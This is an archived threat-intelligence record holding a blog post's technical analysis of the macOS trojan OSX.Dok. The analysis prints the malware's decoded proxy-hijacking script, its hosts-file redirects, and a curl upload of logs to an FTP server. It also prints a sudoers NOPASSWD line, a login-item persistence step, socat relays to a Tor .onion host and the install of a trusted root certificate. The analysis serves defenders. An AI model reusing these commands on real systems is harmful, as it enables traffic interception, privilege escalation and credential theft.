{
	"id": "d10c655e-3c29-4290-b0d9-b3c65e58c411",
	"created_at": "2026-04-06T03:35:37.993535Z",
	"updated_at": "2026-04-10T03:22:13.9854Z",
	"deleted_at": null,
	"sha1_hash": "6551699e414273a03ed31e2ef5b93fd39f650fdc",
	"title": "OSX.Dok Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 273059,
	"plain_text": "OSX.Dok Analysis\r\nPublished: 2019-07-09 · Archived: 2026-04-06 03:22:13 UTC\r\nRecently I found one blog from Sentinelone, https://www.sentinelone.com/blog/macos-malware-2019-first-six-months/, which shows the malware outbreaks on Mac OS X in first half of 2019. I’ve decided to analyze all the\r\nfamily types and post here to have better understanding of the malware samples.\r\nI will not deal with the malware families or their classification, this is just technical blog of what does the malware\r\ndo.\r\nFirst up is OSX\\Dok. Sample we’re analyzing here is c2d081162e50cb4b5957c5df9fbe55c3.\r\nExecutable=/Volumes/Dokument/Dokument.app/Contents/MacOS/AppStore\r\nIdentifier=Swisscom.Application\r\nFormat=bundle with Mach-O thin (x86_64)\r\nCodeDirectory v=20200 size=344 flags=0x0(none) hashes=10+3 location=embedded\r\nHash type=sha1 size=20\r\nCDHash=fd63cc8823bfc9c9fb5122dd6252011e652ae8f4\r\nSignature size=8519\r\nAuthority=Developer ID Application: Anton Ilin (48R325WWDB)\r\nAuthority=Developer ID Certification Authority\r\nAuthority=Apple Root CA\r\nTimestamp=Dec 25, 2018 4:48:39 AM\r\nInfo.plist entries=23\r\nSealed Resources rules=4 files=5\r\nInternal requirements count=1 size=180\r\nSo we can see that the app is signed and bundle identifier is Swisscom.Application.\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 1 of 15\n\nHere is how it looks when you mount and open the\r\nDMG.\r\nHere is the google translation for the text: Click twice on the icon to view the document\r\n·      Inside the App: Now we see what files are inside the app. Nothing out of the ordinary. Here are some plist\r\nfile entries:\r\nLSMinimumSystemVersion\r\n            10.9\r\nNSHumanReadableCopyright\r\n            Copyright © 2017 Swisscom. All rights reserved.\r\nApart from that, we have nib file, which can help in analysis of the file.\r\nOne interesting thing that I observe, the mach-o file name is different from the app name. The mach-o file name is\r\nAppStore while the app name is Dokument.app. Usually with Mac OS X apps, the name of the app and the main\r\nmach-o executable inside have same name, nothing malicious, but strange.\r\nWe’ll see later. MacOS directory only has one 64-bit macho file.\r\nStrings: Now we check the strings of the executable file and see if there are some interesting artifacts\r\nthere. I generally use strings utility of OSX for strings. But strangely enough in this case, there are no\r\nstrings displayed, literally no strings for the executable. So lets deep dive into the hex of AppStore mach-o\r\nfile.\r\nWell look, what I found. Here is the piece of text inside the macho file that explains it all:\r\nInfo: This file is packed with the UPX executable packer http://upx.sf.net $..$Id: UPX 3.93 Copyright (C) 1996-\r\n2017 the UPX Team. All Rights Reserved.\r\nLooks like this macho file is packed. So we unpack now. If its not modified UPX, its should be very easy to\r\nunpack this file, so lets go ahead. Just download upx and run upx -d AppStore command, and there you go, file\r\nunpacked. The file size also increases from 49,488 bytes to 92,544 bytes. Now lets run strings on the unpacked\r\nfile. I got 413 lines of strings. Here are some interesting strings:\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 2 of 15\n\no   ps -A|grep -e /tor -e /socat|grep -v grep\r\nApart from this, I also observe 3 very large base64 encoded strings. Upon decoding there one string doesn’t give\r\nany result but the other two starts to clear picture. Here are the output of the base64 decode:\r\n#!/bin/sh\r\nCheckForNetwork()\r\n{\r\n            local test\r\n            if [ -z \"${NETWORKUP:=}\" ]; then\r\n                        test=$(ifconfig -a inet 2\u003e/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)\r\n                        if [ \"${test}\" -gt 0 ]; then\r\n                                    NETWORKUP=\"-YES-\"\r\n                        else\r\n                                    NETWORKUP=\"-NO-\"\r\n                        fi\r\n            fi\r\n}\r\nCheckForNetwork\r\nwhile [ \"${NETWORKUP}\" != \"-YES-\" ]\r\ndo\r\n        sleep 5\r\n        NETWORKUP=\r\n        CheckForNetwork\r\ndone\r\nsleep 5\r\nip=$(curl api.ipify.org)\r\nstr=$(env LC_CTYPE=C tr -dc \"a-zA-Z0-9\" \u003c /dev/urandom | head -c 10)\r\nautoProxyURL=\"http://127.0.0.1:5555/${str}.js?ip=${ip}\"\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 3 of 15\n\n/usr/sbin/networksetup -detectnewhardware\r\nIFS=$'\\n'\r\n            for i in $(networksetup -listallnetworkservices | tail +2 );\r\n            do\r\n                        autoProxyURLLocal=`/usr/sbin/networksetup -getautoproxyurl \"$i\" | head -1 | cut -c 6-`\r\n                        echo \"$i Proxy set to $autoProxyURLLocal\"\r\n                        if [[ $autoProxyURLLocal == \"(null)\" ]]; then\r\n                                    /usr/sbin/networksetup -setautoproxyurl $i $autoProxyURL\r\n                                    echo \"Set auto proxy for $i to $autoProxyURL\"\r\n                        fi\r\n                        /usr/sbin/networksetup -setautoproxystate \"$i\" on\r\n                        echo \"Turned on auto proxy for $i\"\r\n            done\r\nunset IFS\r\necho \"Auto proxy present, correct \u0026 enabled for all interfaces\"\r\n//hosts\r\n127.0.0.1 localhost\r\n255.255.255.255 broadcasthost\r\n::1             localhost\r\n127.0.0.1 metrics.apple.com\r\n127.0.0.1 ocsp.apple.com\r\n127.0.0.1 su.itunes.apple.com\r\n127.0.0.1 ax.su.itunes.apple.com\r\n127.0.0.1 swscan.apple.com\r\n127.0.0.1 swcdn.apple.com\r\n127.0.0.1 swdist.apple.com\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 4 of 15\n\n127.0.0.1 a1.phobos.apple.com\r\n127.0.0.1 a101.phobos.apple.com\r\n127.0.0.1 a102.phobos.apple.com\r\n127.0.0.1 a103.phobos.apple.com\r\n127.0.0.1 a104.phobos.apple.com\r\n127.0.0.1 a105.phobos.apple.com\r\n127.0.0.1 a11.phobos.apple.com\r\n127.0.0.1 a12.phobos.apple.com\r\n127.0.0.1 a13.phobos.apple.com\r\n127.0.0.1 a14.phobos.apple.com\r\n127.0.0.1 a15.phobos.apple.com\r\n127.0.0.1 access.apple.com\r\n127.0.0.1 advertising.apple.com\r\n127.0.0.1 albert.apple.com\r\n127.0.0.1 ali.apple.com\r\n127.0.0.1 ams.apple.com\r\n127.0.0.1 apple.apple.com\r\n127.0.0.1 apple.com\r\n127.0.0.1 appleconnect.apple.com\r\n127.0.0.1 appleid-it.apple.com\r\n127.0.0.1 appleid.apple.com\r\n127.0.0.1 appleseed.apple.com\r\n127.0.0.1 appleseed3.apple.com\r\n127.0.0.1 appleseedtest.apple.com\r\n127.0.0.1 aps.info.apple.com\r\n127.0.0.1 ara.apple.com\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 5 of 15\n\n127.0.0.1 arait.apple.com\r\n127.0.0.1 asia.apple.com\r\n127.0.0.1 asw.apple.com\r\n127.0.0.1 atlaslms.apple.com\r\n127.0.0.1 av.apple.com\r\n127.0.0.1 benefits.apple.com\r\n127.0.0.1 beta.apple.com\r\n127.0.0.1 bugreport.apple.com\r\n127.0.0.1 bugreporter.apple.com\r\n127.0.0.1 c.apple.com\r\n127.0.0.1 calendar.apple.com\r\n127.0.0.1 certifications-test.apple.com\r\n127.0.0.1 certifications.apple.com\r\n127.0.0.1 certifications2.apple.com\r\n127.0.0.1 checkcoverage.apple.com\r\n127.0.0.1 checkrepair.apple.com\r\n127.0.0.1 concierge-mobile.apple.com\r\n127.0.0.1 concierge.apple.com\r\n127.0.0.1 consultants.apple.com\r\n127.0.0.1 cooljobs.apple.com\r\n127.0.0.1 deimos.apple.com\r\n127.0.0.1 deimos2.apple.com\r\n127.0.0.1 deimos3.apple.com\r\n127.0.0.1 deploy.apple.com\r\n127.0.0.1 developer.apple.com\r\n127.0.0.1 developer2.apple.com\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 6 of 15\n\n127.0.0.1 developertest.apple.com\r\n127.0.0.1 devforums.apple.com\r\n127.0.0.1 devimages.apple.com\r\n127.0.0.1 diagnostics.apple.com\r\n127.0.0.1 discussions.apple.com\r\n127.0.0.1 documentation.apple.com\r\n127.0.0.1 downloads.apple.com\r\n127.0.0.1 ecommerce.apple.com\r\n127.0.0.1 employment.apple.com\r\n127.0.0.1 enterprise.apple.com\r\n127.0.0.1 ep.sap.apple.com\r\n127.0.0.1 erp.apple.com\r\n127.0.0.1 esp-test.apple.com\r\n127.0.0.1 esp.apple.com\r\n127.0.0.1 euro.apple.com\r\n127.0.0.1 events.apple.com\r\n127.0.0.1 ext.apple.com\r\n127.0.0.1 ext1.apple.com\r\n127.0.0.1 extensions.apple.com\r\n127.0.0.1 files.apple.com\r\n127.0.0.1 gspa21.ls.apple.com\r\n127.0.0.1 gsx-it.apple.com\r\n127.0.0.1 gsx.apple.com\r\n127.0.0.1 gsxit.apple.com\r\n127.0.0.1 guide.apple.com\r\n127.0.0.1 help.apple.com\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 7 of 15\n\n127.0.0.1 hrweb.apple.com\r\n127.0.0.1 iad.apple.com\r\n127.0.0.1 iadworkbench.apple.com\r\n127.0.0.1 id.apple.com\r\n127.0.0.1 identity.apple.com\r\n127.0.0.1 iforgot.apple.com\r\n127.0.0.1 images.apple.com\r\n127.0.0.1 index.apple.com\r\n127.0.0.1 init.apple.com\r\n127.0.0.1 investor.apple.com\r\n127.0.0.1 iphone.apple.com\r\n127.0.0.1 itunes.apple.com\r\n127.0.0.1 itunespartner.apple.com\r\n127.0.0.1 jobs.apple.com\r\n127.0.0.1 k.apple.com\r\n127.0.0.1 lists.apple.com\r\n127.0.0.1 locate.apple.com\r\n127.0.0.1 macos.apple.com\r\n127.0.0.1 manuals.info.apple.com\r\n127.0.0.1 manuals01.info.apple.com\r\n127.0.0.1 manuals02.info.apple.com\r\n127.0.0.1 manuals03.info.apple.com\r\n127.0.0.1 manuals04.info.apple.com\r\n127.0.0.1 maps.apple.com\r\n127.0.0.1 mapsconnect.apple.com\r\n127.0.0.1 meetingroom.apple.com\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 8 of 15\n\n127.0.0.1 mfi.apple.com\r\n127.0.0.1 mobile.apple.com\r\n127.0.0.1 mobileaccess.apple.com\r\n127.0.0.1 movies.apple.com\r\n127.0.0.1 movietrailers.apple.com\r\n127.0.0.1 myaccess-it.apple.com\r\n127.0.0.1 myaccess.apple.com\r\n127.0.0.1 mynews.apple.com\r\n127.0.0.1 mystore.apple.com\r\n127.0.0.1 news.apple.com\r\n127.0.0.1 nr.apple.com\r\n127.0.0.1 opensource.apple.com\r\n127.0.0.1 podcastsconnect.apple.com\r\n127.0.0.1 portal.apple.com\r\n127.0.0.1 quicktime.apple.com\r\n127.0.0.1 radar.apple.com\r\n127.0.0.1 register.apple.com\r\n127.0.0.1 relay.apple.com\r\n127.0.0.1 relay1.apple.com\r\n127.0.0.1 relay11.apple.com\r\n127.0.0.1 relay12.apple.com\r\n127.0.0.1 relay13.apple.com\r\n127.0.0.1 relay14.apple.com\r\n127.0.0.1 relay15.apple.com\r\n127.0.0.1 relay2.apple.com\r\n127.0.0.1 relay3.apple.com\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 9 of 15\n\n127.0.0.1 relay4.apple.com\r\n127.0.0.1 relay5.apple.com\r\n127.0.0.1 remoteadvisor.apple.com\r\n127.0.0.1 remoteadvisor1.apple.com\r\n127.0.0.1 remoteadvisor2.apple.com\r\n127.0.0.1 reportaproblem.apple.com\r\n127.0.0.1 s.apple.com\r\n127.0.0.1 safari-extensions.apple.com\r\n127.0.0.1 sales.apple.com\r\n127.0.0.1 salesresources.apple.com\r\n127.0.0.1 school.apple.com\r\n127.0.0.1 selfsolve.apple.com\r\n127.0.0.1 servers.apple.com\r\n127.0.0.1 service.apple.com\r\n127.0.0.1 sift.apple.com\r\n127.0.0.1 signin.apple.com\r\n127.0.0.1 signin.info.apple.com\r\n127.0.0.1 source.apple.com\r\n127.0.0.1 ssl.apple.com\r\n127.0.0.1 sso.apple.com\r\n127.0.0.1 store.apple.com\r\n127.0.0.1 support.apple.com\r\n127.0.0.1 support01.apple.com\r\n127.0.0.1 support02.apple.com\r\n127.0.0.1 support03.apple.com\r\n127.0.0.1 support04.apple.com\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 10 of 15\n\n127.0.0.1 support05.apple.com\r\n127.0.0.1 supportprofile.apple.com\r\n127.0.0.1 supporttest.apple.com\r\n127.0.0.1 survey.apple.com\r\n127.0.0.1 survey2.apple.com\r\n127.0.0.1 swdlp.apple.com\r\n127.0.0.1 time.apple.com\r\n127.0.0.1 time1.apple.com\r\n127.0.0.1 time2.apple.com\r\n127.0.0.1 time3.apple.com\r\n127.0.0.1 time4.apple.com\r\n127.0.0.1 time5.apple.com\r\n127.0.0.1 tips.apple.com\r\n127.0.0.1 trailers.apple.com\r\n127.0.0.1 training.apple.com\r\n127.0.0.1 trainingevents.apple.com\r\n127.0.0.1 uptodate.apple.com\r\n127.0.0.1 volume.apple.com\r\n127.0.0.1 war.apple.com\r\n127.0.0.1 www1.apple.com\r\n127.0.0.1 wwwtest.apple.com\r\n127.0.0.1 xml.apple.com\r\n127.0.0.1 xp.apple.com\r\n127.0.0.1 xp2.apple.com\r\n127.0.0.1 virustotal.com\r\n127.0.0.1 www.virustotal.com\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 11 of 15\n\nWe’ll go through the script first, the second output seems like hosts file entries.\r\nIn the script file, first there is check if internet is active or not and loop until the network is active. And then set\r\nproxy auto-config to http://127.0.0.1:5555/${str}.js?ip=${ip}, where js filename is random 10 character name and\r\nip is ip of the current system.\r\nSo it seems like malware is trying to change proxy on all interfaces and looks like its trying to capture traffic and\r\nsince there is hosts file entries, it can be assumed that it will at some stage will try to change hosts file.\r\nRunning/debugging the app: We’ll try to run the app and see what behavior it shows and also we’ll\r\ndebug to see the workings. When we run the malware, it checks for the path its running from. Tt copies\r\nitself as /Users/shared/AppStore run with “Dokument” as an argument. Meanwhile, it deletes\r\n/Users/admin/Downloads/Dokument.app, looks like the location is hardcoded. Now since the malware\r\nposes as a pdf document, to fool the users, it creates a dialog box using NSAlert with text “It may be\r\ndamaged or use a file format that preview doesn't recognize” and after that it pops up the AppStore\r\nwindow.\r\nThe OS X Updates windows is created at top window with level mainMenuWindow, so if you are debugging the\r\nmalware, the window will be on top of the debugger and will not be able to debug, careful while debugging.\r\nMeanwhile, it also collects logs of its execution and FTPs it to ftp://engel-*****@ftp.keba.com/logs/ using curl:\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 12 of 15\n\ncurl -T \"/tmp/****-mac.log\" ftp://engel*****@ftp.keba.com/logs/\r\nThe log file is stored in tmp dir. The format of the logs is as follow:\r\n[2019-07-09 01:43:04.112]:[DEBUG]:[applicationDidFinishLaunching Start]:[-[AppDelegate\r\napplicationDidFinishLaunching:]]:[34]:[PID: 48271 UID: 502]\r\n[2019-07-09 01:43:04.112]:[DEBUG]:[selfName=Dokument]:[-[AppDelegate applicationDidFinishLaunching:]]:\r\n[61]:[PID: 48271 UID: 502]\r\n[2019-07-09 01:43:04.113]:[DEBUG]:[selfPath=/Users/admin/Desktop/Dokument.app]:[-[AppDelegate\r\napplicationDidFinishLaunching:]]:[62]:[PID: 48271 UID: 502]\r\n[2019-07-09 01:43:04.113]:[DEBUG]:[needLocation=/Users/Shared/AppStore.app]:[-[AppDelegate\r\napplicationDidFinishLaunching:]]:[63]:[PID: 48271 UID: 502]\r\n[2019-07-09 01:43:04.113]:[DEBUG]:[needExecution=/Users/Shared/AppStore.app/Contents/MacOS/AppStore]:\r\n[-[AppDelegate applicationDidFinishLaunching:]]:[64]:[PID: 48271 UID: 502]\r\n[2019-07-09 01:43:04.113]:[DEBUG]:[SelfInstall Start]:[-[AppDelegate SelfInstall]]:[129]:[PID: 48271 UID:\r\n502]\r\n[2019-07-09 01:43:04.132]:[DEBUG]:[Run command: chmod +x /Users/Shared/AppStore.app]:[-\r\n[NSString(ShellExecution) runAsCommand]]:[16]:[PID: 48271 UID: 502]\r\n[2019-07-09 01:43:04.203]:[DEBUG]:[Command='sleep 5 \u0026\u0026 rm -fR \"/Users/admin/Downloads/Dokument.app\"\r\n\u0026\u0026 \"/Users/Shared/AppStore.app/Contents/MacOS/AppStore\" Dokument']:[-[AppDelegate SelfInstall]]:[140]:\r\n[PID: 48271 UID: 502]\r\n[2019-07-09 01:43:09.372]:[DEBUG]:[applicationDidFinishLaunching Start]:[-[AppDelegate\r\napplicationDidFinishLaunching:]]:[34]:[PID: 48276 UID: 502]\r\n[2019-07-09 01:43:09.372]:[DEBUG]:[selfName=AppStore]:[-[AppDelegate applicationDidFinishLaunching:]]:\r\n[61]:[PID: 48276 UID: 502]\r\n[2019-07-09 01:43:09.372]:[DEBUG]:[selfPath=/Users/Shared/AppStore.app]:[-[AppDelegate\r\napplicationDidFinishLaunching:]]:[62]:[PID: 48276 UID: 502]\r\n[2019-07-09 01:43:09.373]:[DEBUG]:[needLocation=/Users/Shared/AppStore.app]:[-[AppDelegate\r\napplicationDidFinishLaunching:]]:[63]:[PID: 48276 UID: 502]\r\n[2019-07-09 01:43:09.373]:[DEBUG]:[needExecution=/Users/Shared/AppStore.app/Contents/MacOS/AppStore]:\r\n[-[AppDelegate applicationDidFinishLaunching:]]:[64]:[PID: 48276 UID: 502]\r\n[2019-07-09 01:43:09.373]:[DEBUG]:[SelfInstall Start]:[-[AppDelegate SelfInstall]]:[129]:[PID: 48276 UID:\r\n502]\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 13 of 15\n\n[2019-07-09 01:43:09.374]:[DEBUG]:[username=admin]:[-[AppDelegate applicationDidFinishLaunching:]]:[79]:\r\n[PID: 48276 UID: 502]\r\n[2019-07-09 01:43:09.375]:[DEBUG]:[launcAgentsPath=/Users/admin/Library/LaunchAgents]:[-[AppDelegate\r\napplicationDidFinishLaunching:]]:[83]:[PID: 48276 UID: 502]\r\n[2019-07-09 01:43:10.151]:[DEBUG]:[IsLoginScriptExists: 0]:[-[AppDelegate IsLoginScriptExists]]:[165]:[PID:\r\n48276 UID: 502]\r\n[2019-07-09 01:43:10.152]:[DEBUG]:[AddLoginScript Start]:[-[AppDelegate AddLoginScript]]:[174]:[PID:\r\n48276 UID: 502]\r\nHere we can see all the info of what module of the malware was executed.\r\nNow when the logs are send to ftp location, the malware then displays the AppStore window and in the\r\nbackground, it again runs /Users/Shared/Appstore.app, but this time without any argument. This is done using\r\nApple Script\r\n\"do shell script \"/Users/Shared/AppStore.app/Contents/MacOS/AppStore\" with administrator privileges\"\r\nAlso the malware looks if its being added into login items, if not its uses AppleScript to add itself to the login\r\nitem.\r\ntell application \"System Events\" to make login item at end with properties {path:\"/Users/Shared/AppStore.app\"}\r\nThen it edits /etc/sudoers file using commands:\r\necho \"admin  ALL=(ALL) NOPASSWD: ALL\" \u003e\u003e /etc/sudoers\"\r\nAfter this, it installs Tor, but before that, closes all browser. It has command to kill 3 browsers:\r\nkillall Safari\r\nkillall firefox\r\nkillall \"Google Chrome\"\"\r\nOnce the browsers are killed, it start installing Tor and socat using homebrew:\r\n\"sudo -u admin /usr/local/bin/brew -v\"\r\n\"-sudo -u admin /usr/local/bin/brew install tor\"\r\n“sudo -u admin /usr/local/bin/brew services start tor\"\r\n\"sudo -u admin /usr/local/bin/brew install socat\"\r\nThe malware install plists in LaunchAgents and one in LaunchDaemons:\r\n/Users/admin/Library/LaunchAgents/com.xusGBXWH.HkSaRXYT_.plist\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 14 of 15\n\narguments: /usr/local/bin/socat\r\n            arguments: \"tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1\"\r\n            arguments: \"SOCKS4A:127.0.0.1:ltro3fxssy7xsqgz.onion:80,socksport=9050\"\r\n/Users/admin/Library/LaunchAgents/com.iOTYUKkR.dnEZhCgS_.plist\r\n            arguments: /usr/local/bin/socat\r\n            arguments: \"tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1\"\r\n            arguments: \"SOCKS4A:127.0.0.1:ltro3fxssy7xsqgz.onion:5588,socksport=9050\"\r\n/Library/LaunchDaemons/com.cronto.SignApp.plist\r\n            Arguments: /usr/local/bin/YVSreTsa\r\nThe plists in LaunchAgents have random names, while in LaunchDaemons seems to have hardcoded name.\r\n/usr/local/bin/YVSreTsa is the script we encountered while doing strings on the file, which change the proxy and\r\nthe hosts file.\r\nThe socat utility is used to listen on  port 5555 and 5588. It receives command from the attacker. The malware\r\nalso edits the hosts file with the entries we saw above. The traffic is redirect to 127.0.0.1, which is then transferred\r\nto the tor server that we see in the plist file.\r\nAfter creating the plists, the malware also tries to install a certificate into the keychain most probably to sniff into\r\nencrypted traffic:\r\nbsecurity add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/bDCVMesG.der\r\nSummary\r\nSo We tried to see what OSX.Dok is doing and how it is doing all the stuff. We can conclude following points\r\nabout the malware from this:\r\n·      Its basically a Trojan, comes in your system, make persistence, opens port for the attacker, listen to traffic and\r\nsends data to a Tor server.\r\n·      Maintains log of the infected Macs and execution steps.\r\n·      Changes hosts file and install cert and listen to all traffic.\r\n·      Now if we see the hosts entries that we found, all of them are related to apple.com. So may be, may be the\r\nmalware is targeting apple developers or users to steal their credentials\r\nSource: https://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nhttps://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html"
	],
	"report_names": [
		"osxdok-analysis.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775446537,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6551699e414273a03ed31e2ef5b93fd39f650fdc.pdf",
		"text": "https://archive.orkl.eu/6551699e414273a03ed31e2ef5b93fd39f650fdc.txt",
		"img": "https://archive.orkl.eu/6551699e414273a03ed31e2ef5b93fd39f650fdc.jpg"
	}
}